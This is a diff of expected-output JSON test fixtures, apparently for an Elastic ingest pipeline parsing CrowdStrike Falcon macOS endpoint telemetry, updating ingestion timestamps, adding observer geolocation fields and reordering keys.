@@ -3385,7 +3871,7 @@ ] }, "event": { - "ingested": "2021-12-09T13:36:11.150861Z", + "ingested": "2021-12-14T14:41:26.533768060Z", "original": "{\"event_simpleName\":\"PdfFileWritten\",\"ContextTimeStamp\":\"1625677488.523\",\"ConfigStateHash\":\"3090255842\",\"ContextProcessId\":\"364156540965623394\",\"ContextThreadId\":\"0\",\"aip\":\"67.43.156.13\",\"FileIdentifier\":\"05000001000000000000000000000000f1321d0000000000\",\"ConfigBuild\":\"1007.4.0013701.1\",\"event_platform\":\"Mac\",\"Entitlements\":\"15\",\"name\":\"PdfFileWrittenMacV1\",\"id\":\"ffffffff-1111-11eb-8903-022a1941b91f\",\"EffectiveTransmissionClass\":\"2\",\"aid\":\"ffffffffc4044541995bffd84b9df003\",\"timestamp\":\"1625677488576\",\"cid\":\"ffffffff15754bcfb5f9152ec7ac90ac\",\"TargetFileName\":\"/private/var/folders/pt/s9pzbbwd07q_0fxqvfhc513r0000gp/T/com.microsoft.Excel/Content.MSO/mso6ACABA95\"}", "created": "2021-07-07T17:04:48.576Z", "kind": "event", @@ -3408,24 +3894,27 @@ } }, { - "os": { - "type": "macos" - }, - "url": { - "scheme": "http" - }, - "tags": [ - "preserve_original_event" - ], "observer": { - "serial_number": "ffffffff44564c2f8d76394cb25c31ab", + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, "address": "67.43.156.13", - "type": "agent", - "version": "1007.4.0013701.1", "vendor": "crowdstrike", - "ip": "67.43.156.13" + "ip": "67.43.156.13", + "serial_number": "ffffffff44564c2f8d76394cb25c31ab", + "type": "agent", + "version": "1007.4.0013701.1" }, "@timestamp": "2021-07-07T17:04:38.379Z", + "os": { + "type": "macos" + }, "ecs": { "version": "1.12.0" }, 
@@ -3445,7 +3934,7 @@ }, "event": { "action": "GroupIdentity", - "ingested": "2021-12-09T13:36:11.150867300Z", + "ingested": "2021-12-14T14:41:26.533768454Z", "original": "{\"event_simpleName\":\"GroupIdentity\",\"GID\":\"242\",\"AuthenticationUuidAsString\":\"ABCDEFAB-CDEF-ABCD-EFAB-CDEF000000F2\",\"ConfigStateHash\":\"3967242894\",\"aip\":\"67.43.156.13\",\"AuthenticationId\":\"1119489580471877843\",\"UserPrincipal\":\"user2@dom1\",\"UserSid\":\"S-1-5-21-3852557355-3178143607-2040168074-1485\",\"ConfigBuild\":\"1007.4.0013701.1\",\"event_platform\":\"Mac\",\"Entitlements\":\"15\",\"name\":\"GroupIdentityMacV2\",\"id\":\"ffffffff-1111-11eb-9dc2-029257dbe83b\",\"EffectiveTransmissionClass\":\"2\",\"aid\":\"ffffffff44564c2f8d76394cb25c31ab\",\"AuthenticationUuid\":\"ABCDEFAB-CDEF-ABCD-EFAB-CDEF000000F2\",\"timestamp\":\"1625677478379\",\"cid\":\"ffffffff15754bcfb5f9152ec7ac90ac\"}", "id": "ffffffff-1111-11eb-9dc2-029257dbe83b", "created": "2021-07-07T17:04:38.379Z" @@ -3468,7 +3957,13 @@ "group": { "id": "242" } - } + }, + "url": { + "scheme": "http" + }, + "tags": [ + "preserve_original_event" + ] }, { "process": { @@ -3487,12 +3982,21 @@ "preserve_original_event" ], "observer": { - "serial_number": "ffffffff44564c2f8d76394cb25c31ab", + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, "address": "67.43.156.13", - "type": "agent", - "version": "1007.4.0013701.1", "vendor": "crowdstrike", - "ip": "67.43.156.13" + "ip": "67.43.156.13", + "serial_number": "ffffffff44564c2f8d76394cb25c31ab", + "type": "agent", + "version": "1007.4.0013701.1" }, "@timestamp": "2021-07-07T01:50:11.845Z", "file": { 
@@ -3523,7 +4027,7 @@ ] }, "event": { - "ingested": "2021-12-09T13:36:11.150873600Z", + "ingested": "2021-12-14T14:41:26.533768897Z", "original": "{\"event_simpleName\":\"MachOFileWritten\",\"ContextTimeStamp\":\"1625622611.845\",\"ConfigStateHash\":\"3967242894\",\"MachOSubType\":\"3\",\"ContextProcessId\":\"364938429384226082\",\"Size\":\"0\",\"ContextThreadId\":\"0\",\"aip\":\"67.43.156.13\",\"SHA256HashData\":\"c0f50d27fe9fb31e33d1ce6577eeb4d4e17639095ad20575da018d1fcf955198\",\"FileIdentifier\":\"04000001000000000000000000000000ac41270400000000\",\"ConfigBuild\":\"1007.4.0013701.1\",\"event_platform\":\"Mac\",\"Entitlements\":\"15\",\"name\":\"MachOFileWrittenMacV3\",\"id\":\"ffffffff-1111-11eb-9dc2-029257dbe83b\",\"EffectiveTransmissionClass\":\"2\",\"aid\":\"ffffffff44564c2f8d76394cb25c31ab\",\"timestamp\":\"1625677479336\",\"cid\":\"ffffffff15754bcfb5f9152ec7ac90ac\",\"TargetFileName\":\"/private/var/folders/bf/dwpvdj3d1tq00l8fgs5rd7x00000gn/T/.net.example.desktop.ev80yl\"}", "created": "2021-07-07T17:04:39.336Z", "kind": "event", @@ -3575,12 +4079,21 @@ "direction": "unknown" }, "observer": { - "serial_number": "ffffffff44564c2f8d76394cb25c31ab", + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, "address": "67.43.156.13", - "type": "agent", - "version": "1007.4.0013701.1", "vendor": "crowdstrike", - "ip": "67.43.156.13" + "ip": "67.43.156.13", + "serial_number": "ffffffff44564c2f8d76394cb25c31ab", + "type": "agent", + "version": "1007.4.0013701.1" }, "@timestamp": "2021-07-07T01:50:08.014Z", "ecs": { 
@@ -3600,7 +4113,7 @@ ] }, "event": { - "ingested": "2021-12-09T13:36:11.150879900Z", + "ingested": "2021-12-14T14:41:26.533769296Z", "original": "{\"event_simpleName\":\"NetworkListenIP6\",\"ContextTimeStamp\":\"1625622608.014\",\"LocalAddressIP6\":\"0:0:0:0:0:0:0:0\",\"RemoteAddressIP6\":\"0:0:0:0:0:0:0:0\",\"ConfigStateHash\":\"3967242894\",\"ConnectionFlags\":\"0\",\"ContextProcessId\":\"364938390018585510\",\"RemotePort\":\"0\",\"aip\":\"67.43.156.13\",\"ConfigBuild\":\"1007.4.0013701.1\",\"event_platform\":\"Mac\",\"LocalPort\":\"8770\",\"Entitlements\":\"15\",\"name\":\"NetworkListenIP6MacV10\",\"id\":\"ffffffff-1111-11eb-9dc2-029257dbe83b\",\"Protocol\":\"6\",\"EffectiveTransmissionClass\":\"3\",\"aid\":\"ffffffff44564c2f8d76394cb25c31ab\",\"ConnectionDirection\":\"2\",\"InContext\":\"0\",\"timestamp\":\"1625677478929\",\"cid\":\"ffffffff15754bcfb5f9152ec7ac90ac\"}", "created": "2021-07-07T17:04:38.929Z", "kind": "event", @@ -3626,17 +4139,23 @@ }, { "observer": { - "serial_number": "ffffffff62714a708030d494ca0a7e60", + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, "address": "67.43.156.14", - "type": "agent", - "version": "1007.4.0013701.1", "vendor": "crowdstrike", - "ip": "67.43.156.14" + "ip": "67.43.156.14", + "serial_number": "ffffffff62714a708030d494ca0a7e60", + "type": "agent", + "version": "1007.4.0013701.1" }, "@timestamp": "2021-07-07T17:05:02.693Z", - "os": { - "type": "macos" - }, "ecs": { "version": "1.12.0" }, 
@@ -3651,8 +4170,11 @@ "67.43.156.14" ] }, + "os": { + "type": "macos" + }, "event": { - "ingested": "2021-12-09T13:36:11.150886200Z", + "ingested": "2021-12-14T14:41:26.533769686Z", "original": "{\"event_simpleName\":\"CurrentSystemTags\",\"ConfigStateHash\":\"3090255842\",\"aip\":\"67.43.156.14\",\"ConfigBuild\":\"1007.4.0013701.1\",\"event_platform\":\"Mac\",\"SystemTableIndex\":\"0\",\"Entitlements\":\"15\",\"name\":\"CurrentSystemTagsMacV1\",\"id\":\"ffffffff-1111-11eb-b88d-06b7cb0d7bd7\",\"EffectiveTransmissionClass\":\"0\",\"aid\":\"ffffffff62714a708030d494ca0a7e60\",\"Tags\":\"312, 11544872091698, 21990232555653, 21990232555859, 26388279066700, 26388279066703, 26388279066704, 26388279066705, 26388279066708, 26388279066849, 26388279066855, 26388279066948, 26388279066958, 26388279066970, 26388279067150, 26388279067174, 26388279067175, 26405458935929, 26405458935963, 26405458935964, 26405458936063, 26405458936087, 26405458936088, 26405458936130, 26405458936163, 26405458936164, 26405458936166, 26405458936167, 26405458936242, 26405458936306, 26405458936307, 26405458936357, 26405458936510, 26405458936511, 26405458936522, 26405458936523, 26422638805193, 26422638805230, 26422638805244, 26422638805245, 26422638805246, 26439818674539, 26439818674540, 26439818674541, 26439818674542, 26439818674543, 26439818674544, 26439818674614, 26439818674615, 26439818674616, 26439818674617, 26439818674678, 26439818674679, 26439818674680, 26439818674882, 26439818674883, 26439818674884, 26439818674894, 26439818674895, 26439818674896, 26456998543646, 26456998543647, 26456998543648, 26456998543649, 26456998543650, 26456998543651, 26456998543652, 26456998543653, 26456998543654, 26456998543656, 26456998543721, 26456998543722, 26456998543744, 26456998543793, 26456998543811, 26456998543903, 26456998543904, 26456998543950, 26456998543963, 26456998544000, 26456998544045, 26456998544086, 26456998544087, 26456998544115, 30803505447073, 30803505447074, 30803505447075, 30803505447076, 
30803505447077, 30803505447078, 30803505447194, 30803505447195, 30803505447196, 30803505447528, 30803505447529, 30803505447530, 30803505447532, 30803505447533, 30803505447534, 30803505447537, 30803505447538, 30803505447539, 30803505447541, 30803505447542, 30803505447543, 30803505447567, 30803505447568, 30803505447569, 30803505447571, 30803505447572, 30803505447573, 30803505447575, 30803505447576, 30803505447577, 30803505447579, 30803505447580, 30803505447581, 30803505447583, 30803505447584\",\"timestamp\":\"1625677502693\",\"cid\":\"ffffffff15754bcfb5f9152ec7ac90ac\"}", "created": "2021-07-07T17:05:02.693Z", "kind": "state", @@ -3819,12 +4341,21 @@ "preserve_original_event" ], "observer": { - "serial_number": "ffffffff28414c2293e35c360213e723", + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, "address": "67.43.156.14", - "type": "agent", - "version": "1007.4.0013701.1", "vendor": "crowdstrike", - "ip": "67.43.156.14" + "ip": "67.43.156.14", + "serial_number": "ffffffff28414c2293e35c360213e723", + "type": "agent", + "version": "1007.4.0013701.1" }, "@timestamp": "2021-07-07T17:05:33.027Z", "file": { 
@@ -3853,7 +4384,7 @@ ] }, "event": { - "ingested": "2021-12-09T13:36:11.150892800Z", + "ingested": "2021-12-14T14:41:26.533770264Z", "original": "{\"event_simpleName\":\"NewExecutableWritten\",\"ContextTimeStamp\":\"1625677533.027\",\"ConfigStateHash\":\"1620585913\",\"ContextProcessId\":\"362208380891022165\",\"Size\":\"596224\",\"ContextThreadId\":\"0\",\"aip\":\"67.43.156.14\",\"SHA256HashData\":\"70a06a11057efb22285a7200a53e5b6bae001fe0a98d4b23d0f6a31ad818a005\",\"ConfigBuild\":\"1007.4.0013701.1\",\"event_platform\":\"Mac\",\"Entitlements\":\"15\",\"name\":\"NewExecutableWrittenMacV2\",\"id\":\"ffffffff-1111-11eb-985c-02152dd35bc1\",\"EffectiveTransmissionClass\":\"2\",\"aid\":\"ffffffff28414c2293e35c360213e723\",\"timestamp\":\"1625677533060\",\"cid\":\"ffffffff15754bcfb5f9152ec7ac90ac\",\"TargetFileName\":\"/private/var/folders/3c/z7j1h7dx3nz3xkl10c1vyxgh0000gp/T/.com.google.Chrome.CVG7Ya/Zoom.app/Contents/MacOS/app_mode_loader\",\"VnodeModificationType\":\"0\"}", "created": "2021-07-07T17:05:33.060Z", "kind": "event", @@ -3877,22 +4408,22 @@ } }, { - "os": { - "type": "macos" - }, - "url": { - "scheme": "http" - }, - "tags": [ - "preserve_original_event" - ], "observer": { - "serial_number": "fffffffffbea48169985c2c2bae89d1d", + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, "address": "67.43.156.14", - "type": "agent", - "version": "1007.4.0013701.1", "vendor": "crowdstrike", - "ip": "67.43.156.14" + "ip": "67.43.156.14", + "serial_number": "fffffffffbea48169985c2c2bae89d1d", + "type": "agent", + "version": "1007.4.0013701.1" }, "@timestamp": "2021-07-07T17:03:48.827Z", "file": { @@ -3902,6 +4433,9 @@ "type": "file", "directory": "/Users/user5/.rbenv/versions/2.6.5/bin" }, + "os": { + "type": "macos" + }, "ecs": { "version": "1.12.0" }, 
@@ -3918,7 +4452,7 @@ ] }, "event": { - "ingested": "2021-12-09T13:36:11.150899200Z", + "ingested": "2021-12-14T14:41:26.533770666Z", "original": "{\"event_simpleName\":\"LfoUploadDataComplete\",\"LfoUploadFlags\":\"4\",\"AttemptNumber\":\"0\",\"ConfigStateHash\":\"3090255842\",\"SourceFileName\":\"/Users/user5/.rbenv/versions/2.6.5/bin/ruby\",\"Size\":\"3876424\",\"aip\":\"67.43.156.14\",\"SHA256HashData\":\"d7b56e2a06304ecd343985a1aaedff2eb32ee1151bba0e152aff97c778b7562a\",\"UploadId\":\"8023668629276690295\",\"ConfigBuild\":\"1007.4.0013701.1\",\"event_platform\":\"Mac\",\"Entitlements\":\"15\",\"name\":\"LfoUploadDataCompleteMacV3\",\"id\":\"ffffffff-1111-11eb-a2ab-024aafff599f\",\"EffectiveTransmissionClass\":\"2\",\"aid\":\"fffffffffbea48169985c2c2bae89d1d\",\"Tags\":\"312, 11544872091698, 21990232555653, 21990232555859, 26388279066700, 26388279066703, 26388279066704, 26388279066705, 26388279066708, 26388279066849, 26388279066855, 26388279066948, 26388279066958, 26388279066970, 26388279067150, 26388279067174, 26388279067175, 26405458935929, 26405458935963, 26405458935964, 26405458936063, 26405458936087, 26405458936088, 26405458936130, 26405458936163, 26405458936164, 26405458936166, 26405458936167, 26405458936242, 26405458936306, 26405458936307, 26405458936357, 26405458936510, 26405458936511, 26405458936522, 26405458936523, 26422638805193, 26422638805230, 26422638805244, 26422638805245, 26422638805246, 26439818674539, 26439818674540, 26439818674541, 26439818674542, 26439818674543, 26439818674544, 26439818674614, 26439818674615, 26439818674616, 26439818674617, 26439818674678, 26439818674679, 26439818674680, 26439818674882, 26439818674883, 26439818674884, 26439818674894, 26439818674895, 26439818674896, 26456998543646, 26456998543647, 26456998543648, 26456998543649, 26456998543650, 26456998543651, 26456998543652, 26456998543653, 26456998543654, 26456998543656, 26456998543721, 26456998543722, 26456998543744, 26456998543793, 26456998543811, 26456998543903, 
26456998543904, 26456998543950, 26456998543963, 26456998544000, 26456998544045, 26456998544086, 26456998544087, 26456998544115, 30803505447073, 30803505447074, 30803505447075, 30803505447076, 30803505447077, 30803505447078, 30803505447194, 30803505447195, 30803505447196, 30803505447528, 30803505447529, 30803505447530, 30803505447532, 30803505447533, 30803505447534, 30803505447537, 30803505447538, 30803505447539, 30803505447541, 30803505447542, 30803505447543, 30803505447567, 30803505447568, 30803505447569, 30803505447571, 30803505447572, 30803505447573, 30803505447575, 30803505447576, 30803505447577, 30803505447579, 30803505447580, 30803505447581, 30803505447583, 30803505447584\",\"timestamp\":\"1625677428827\",\"cid\":\"ffffffff15754bcfb5f9152ec7ac90ac\"}", "created": "2021-07-07T17:03:48.827Z", "kind": "event", @@ -4062,21 +4596,33 @@ "30803505447584" ], "cid": "ffffffff15754bcfb5f9152ec7ac90ac" - } + }, + "url": { + "scheme": "http" + }, + "tags": [ + "preserve_original_event" + ] }, { "observer": { - "serial_number": "ffffffffd452449b8d1eb7d85b146650", + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, "address": "67.43.156.14", - "type": "agent", - "version": "1007.4.0013701.1", "vendor": "crowdstrike", - "ip": "67.43.156.14" + "ip": "67.43.156.14", + "serial_number": "ffffffffd452449b8d1eb7d85b146650", + "type": "agent", + "version": "1007.4.0013701.1" }, "@timestamp": "2021-07-07T17:04:13.146Z", - "os": { - "type": "macos" - }, "ecs": { "version": "1.12.0" }, 
@@ -4091,9 +4637,12 @@ "67.43.156.14" ] }, + "os": { + "type": "macos" + }, "event": { "action": "LightningLatencyInfo", - "ingested": "2021-12-09T13:36:11.150905600Z", + "ingested": "2021-12-14T14:41:26.533771059Z", "original": "{\"event_simpleName\":\"LightningLatencyInfo\",\"LightningLatencyState\":\"3\",\"ConfigStateHash\":\"3090255842\",\"aip\":\"67.43.156.14\",\"ConfigBuild\":\"1007.4.0013701.1\",\"event_platform\":\"Mac\",\"Entitlements\":\"15\",\"name\":\"LightningLatencyInfoMacV1\",\"id\":\"ffffffff-1111-11eb-b44e-069a02b0ad6b\",\"EffectiveTransmissionClass\":\"0\",\"aid\":\"ffffffffd452449b8d1eb7d85b146650\",\"timestamp\":\"1625677453146\",\"cid\":\"ffffffff15754bcfb5f9152ec7ac90ac\"}", "id": "ffffffff-1111-11eb-b44e-069a02b0ad6b", "created": "2021-07-07T17:04:13.146Z" @@ -4115,17 +4664,23 @@ }, { "observer": { - "serial_number": "ffffffff8eb649cf8d82be1e65629a0e", + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, "address": "67.43.156.14", - "type": "agent", - "version": "1007.4.0013701.1", "vendor": "crowdstrike", - "ip": "67.43.156.14" + "ip": "67.43.156.14", + "serial_number": "ffffffff8eb649cf8d82be1e65629a0e", + "type": "agent", + "version": "1007.4.0013701.1" }, "@timestamp": "2021-07-07T17:04:10.083Z", - "os": { - "type": "macos" - }, "ecs": { "version": "1.12.0" }, 
@@ -4140,8 +4695,11 @@ "67.43.156.14" ] }, + "os": { + "type": "macos" + }, "event": { - "ingested": "2021-12-09T13:36:11.150911900Z", + "ingested": "2021-12-14T14:41:26.533771442Z", "original": "{\"event_simpleName\":\"NeighborListIP4\",\"ConfigStateHash\":\"1620585913\",\"NeighborList\":\"40-C7-29-FF-FF-FF|192.168.2.1|1|64-9A-BE-FF-FF-FF|192.168.2.10|0|F0-FF-FF-FF-A0-14|192.168.2.43|0|DE-58-FF-FF-5D-3B|192.168.2.113|0|5E-AA-FF-FF-FF-20|192.168.2.128|0|44-FF-FF-FF-03-DD|192.168.2.136|0|EE-74-EE-EE-FF-0D|192.168.2.137|0|3A-FF-FF-FF-03-26|192.168.2.144|0|DE-79-FF-FF-FF-D4|192.168.2.145|0|0E-24-FF-EE-EE-87|192.168.2.152|0|CC-D9-AC-AF-66-F8|192.168.2.153|0|\",\"aip\":\"67.43.156.14\",\"InterfaceIndex\":\"6\",\"ConfigBuild\":\"1007.4.0013701.1\",\"event_platform\":\"Mac\",\"Entitlements\":\"15\",\"name\":\"NeighborListIP4MacV1\",\"id\":\"ffffffff-1111-11eb-9dc0-06c6f5278873\",\"EffectiveTransmissionClass\":\"3\",\"aid\":\"ffffffff8eb649cf8d82be1e65629a0e\",\"timestamp\":\"1625677450083\",\"cid\":\"ffffffff15754bcfb5f9152ec7ac90ac\"}", "created": "2021-07-07T17:04:10.083Z", "kind": "state", @@ -4223,12 +4781,21 @@ "preserve_original_event" ], "observer": { - "serial_number": "ffffffff2d984e32b702789b54f0f811", + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, "address": "67.43.156.14", - "type": "agent", - "version": "1007.4.0013701.1", "vendor": "crowdstrike", - "ip": "67.43.156.14" + "ip": "67.43.156.14", + "serial_number": "ffffffff2d984e32b702789b54f0f811", + "type": "agent", + "version": "1007.4.0013701.1" }, "@timestamp": "2021-07-07T17:04:14.557Z", "file": { 
@@ -4254,7 +4821,7 @@ ] }, "event": { - "ingested": "2021-12-09T13:36:11.150918200Z", + "ingested": "2021-12-14T14:41:26.533772326Z", "original": "{\"event_simpleName\":\"ZipFileWritten\",\"ContextTimeStamp\":\"1625677454.557\",\"ConfigStateHash\":\"3090255842\",\"ContextProcessId\":\"365039419134863763\",\"ContextThreadId\":\"0\",\"aip\":\"67.43.156.14\",\"FileIdentifier\":\"07000001000000000000000000000000b1445a0900000000\",\"ConfigBuild\":\"1007.4.0013701.1\",\"event_platform\":\"Mac\",\"Entitlements\":\"15\",\"name\":\"ZipFileWrittenMacV1\",\"id\":\"ffffffff-1111-11eb-ab6e-0668ec51180b\",\"EffectiveTransmissionClass\":\"2\",\"aid\":\"ffffffff2d984e32b702789b54f0f811\",\"timestamp\":\"1625677454723\",\"cid\":\"ffffffff15754bcfb5f9152ec7ac90ac\",\"TargetFileName\":\"/Users/user6/Library/Developer/CoreSimulator/Devices/BCE6B46B-E863-4151-AA9D-D71C79438C47/data/Containers/Data/Application/1249A061-F246-4338-AE56-4373E918C9B4/Library/Application Support/com.instacart.instashopper/LogCache/2021-07-06T23:44:46.133Z.zip\"}", "created": "2021-07-07T17:04:14.723Z", "kind": "event", @@ -4287,12 +4854,21 @@ "preserve_original_event" ], "observer": { - "serial_number": "ffffffffbea440b9aad8b5bf222d303f", + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, "address": "67.43.156.14", - "type": "agent", - "version": "6.24.13701.0", "vendor": "crowdstrike", - "ip": "67.43.156.14" + "ip": "67.43.156.14", + "serial_number": "ffffffffbea440b9aad8b5bf222d303f", + "type": "agent", + "version": "6.24.13701.0" }, "@timestamp": "2021-07-07T17:04:05.731Z", "file": { 
@@ -4319,7 +4895,7 @@ "hostname": "comp2" }, "event": { - "ingested": "2021-12-09T13:36:11.150924500Z", + "ingested": "2021-12-14T14:41:26.533772768Z", "original": "{\"AgentVersion\":\"6.24.13701.0\",\"aip\":\"67.43.156.14\",\"ConfigIDBase\":\"65994753\",\"BiosReleaseDate\":\"01/06/2021\",\"CpuFeaturesMask\":\"7494065083858915\",\"ChasisManufacturer\":\"Apple Inc.\",\"SystemSerialNumber\":\"C02F649EMD6R\",\"event_platform\":\"Mac\",\"AgentLoadFlags\":\"0\",\"CpuVendor\":\"0\",\"id\":\"ffffffff-1111-11eb-b3de-06a53f021cc9\",\"BiosVersion\":\"1554.80.3.0.0 (iBridge: 18.16.14347.0.0,0)\",\"CpuSignature\":\"591594\",\"EffectiveTransmissionClass\":\"0\",\"MoboProductName\":\"Mac-E1008331FDC96864\",\"timestamp\":\"1625677460451\",\"MicrocodeSignature\":\"16045690984229358334\",\"event_simpleName\":\"AgentOnline\",\"ContextTimeStamp\":\"1625677445.731\",\"SystemProductName\":\"MacBookPro16,1\",\"MoboManufacturer\":\"Apple Inc.\",\"ConfigStateHash\":\"3967242894\",\"ConfigBuild\":\"1007.4.0013701.1\",\"SystemSku\":\" \",\"SensorGroupingTags\":\"\",\"ConfigurationVersion\":\"10\",\"AgentLocalTime\":\"1625677445.731\",\"BiosManufacturer\":\"Apple Inc.\",\"Entitlements\":\"15\",\"name\":\"AgentOnlineMacV13\",\"ConfigIDPlatform\":\"4\",\"ComputerName\":\"comp2\",\"ChassisType\":\"9\",\"ConfigIDBuild\":\"13701\",\"SystemManufacturer\":\"Apple Inc.\",\"aid\":\"ffffffffbea440b9aad8b5bf222d303f\",\"ProvisionState\":\"1\",\"cid\":\"ffffffff15754bcfb5f9152ec7ac90ac\",\"TargetFileName\":\"Zero\"}", "created": "2021-07-07T17:04:20.451Z", "kind": "state", 
@@ -4385,12 +4961,21 @@ "preserve_original_event" ], "observer": { - "serial_number": "ffffffff8eca418b7a861be9c5f7de1d", + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, "address": "67.43.156.14", - "type": "agent", - "version": "1007.4.0013701.1", "vendor": "crowdstrike", - "ip": "67.43.156.14" + "ip": "67.43.156.14", + "serial_number": "ffffffff8eca418b7a861be9c5f7de1d", + "type": "agent", + "version": "1007.4.0013701.1" }, "@timestamp": "2021-07-07T17:03:58.515Z", "file": { @@ -4415,7 +5000,7 @@ ] }, "event": { - "ingested": "2021-12-09T13:36:11.150930800Z", + "ingested": "2021-12-14T14:41:26.533773165Z", "original": "{\"event_simpleName\":\"CriticalFileAccessed\",\"ContextTimeStamp\":\"1625677438.515\",\"GID\":\"0\",\"ConfigStateHash\":\"3090255842\",\"ContextProcessId\":\"365053399098988534\",\"ContextThreadId\":\"0\",\"aip\":\"67.43.156.14\",\"ConfigBuild\":\"1007.4.0013701.1\",\"UID\":\"0\",\"event_platform\":\"Mac\",\"UnixMode\":\"384\",\"Entitlements\":\"15\",\"name\":\"CriticalFileAccessedMacV1\",\"id\":\"ffffffff-1111-11eb-956a-02748d01bd3d\",\"EffectiveTransmissionClass\":\"2\",\"aid\":\"ffffffff8eca418b7a861be9c5f7de1d\",\"timestamp\":\"1625677438553\",\"cid\":\"ffffffff15754bcfb5f9152ec7ac90ac\",\"TargetFileName\":\"/private/var/db/dslocal/nodes/Default/users/daemon.plist\"}", "created": "2021-07-07T17:03:58.553Z", "kind": "alert", 
@@ -4446,18 +5031,23 @@ }, { "observer": { - "serial_number": "ffffffffbea440b9aad8b5bf222d303f", + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, "address": "67.43.156.14", - "type": "agent", - "version": "6.24.13701.0", "vendor": "crowdstrike", - "ip": "67.43.156.14" + "ip": "67.43.156.14", + "serial_number": "ffffffffbea440b9aad8b5bf222d303f", + "type": "agent", + "version": "6.24.13701.0" }, "@timestamp": "2021-07-07T17:04:22.356Z", - "os": { - "type": "macos", - "version": "Darwin Kernel Version 19.6.0: Tue Jan 12 22:13:05 PST 2021; root:xnu-6153.141.16~1/RELEASE_X86_64" - }, "ecs": { "version": "1.12.0" }, 
@@ -4472,8 +5062,12 @@ "67.43.156.14" ] }, + "os": { + "type": "macos", + "version": "Darwin Kernel Version 19.6.0: Tue Jan 12 22:13:05 PST 2021; root:xnu-6153.141.16~1/RELEASE_X86_64" + }, "event": { - "ingested": "2021-12-09T13:36:11.150937Z", + "ingested": "2021-12-14T14:41:26.533773564Z", "original": "{\"MajorVersion\":\"19\",\"event_simpleName\":\"OsVersionInfo\",\"OSVersionFileData\":\"3c3f786d6c2076657273696f6e3d22312e302220656e636f64696e673d225554462d38223f3e0a3c21444f435459504520706c697374205055424c494320222d2f2f4170706c652f2f44544420504c49535420312e302f2f454e222022687474703a2f2f7777772e6170706c652e636f6d2f445444732f50726f70657274794c6973742d312e302e647464223e0a3c706c6973742076657273696f6e3d22312e30223e0a3c646963743e0a093c6b65793e50726f647563744275696c6456657273696f6e3c2f6b65793e0a093c737472696e673e3139483532343c2f737472696e673e0a093c6b65793e50726f64756374436f707972696768743c2f6b65793e0a093c737472696e673e313938332d32303231204170706c6520496e632e3c2f737472696e673e0a093c6b65793e50726f647563744e616d653c2f6b65793e0a093c737472696e673e4d6163204f5320583c2f737472696e673e0a093c6b65793e50726f647563745573657256697369626c6556657273696f6e3c2f6b65793e0a093c737472696e673e31302e31352e373c2f737472696e673e0a093c6b65793e50726f6475637456657273696f6e3c2f6b65793e0a093c737472696e673e31302e31352e373c2f737472696e673e0a093c6b65793e694f53537570706f727456657273696f6e3c2f6b65793e0a093c737472696e673e31332e363c2f737472696e673e0a3c2f646963743e0a3c2f706c6973743e0a\",\"ConfigStateHash\":\"3967242894\",\"AgentVersion\":\"6.24.13701.0\",\"aip\":\"67.43.156.14\",\"MinorVersion\":\"6\",\"OSVersionString\":\"Darwin Kernel Version 19.6.0: Tue Jan 12 22:13:05 PST 2021; 
root:xnu-6153.141.16~1/RELEASE_X86_64\",\"ConfigBuild\":\"1007.4.0013701.1\",\"event_platform\":\"Mac\",\"Entitlements\":\"15\",\"name\":\"OsVersionInfoMacV3\",\"RFMState\":\"0\",\"id\":\"ffffffff-1111-11eb-b3de-06a53f021cc9\",\"OSVersionFileName\":\"/System/Library/CoreServices/SystemVersion.plist\",\"EffectiveTransmissionClass\":\"2\",\"aid\":\"ffffffffbea440b9aad8b5bf222d303f\",\"timestamp\":\"1625677462356\",\"cid\":\"ffffffff15754bcfb5f9152ec7ac90ac\"}", "created": "2021-07-07T17:04:22.356Z", "kind": "event", @@ -4509,17 +5103,23 @@ }, { "observer": { - "serial_number": "ffffffff4f4044b689d6420d303e4ecd", + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, "address": "67.43.156.14", - "type": "agent", - "version": "1007.8.0010912.1", "vendor": "crowdstrike", - "ip": "67.43.156.14" + "ip": "67.43.156.14", + "serial_number": "ffffffff4f4044b689d6420d303e4ecd", + "type": "agent", + "version": "1007.8.0010912.1" }, "@timestamp": "2021-07-07T17:03:56.454Z", - "os": { - "type": "linux" - }, "ecs": { "version": "1.12.0" }, 
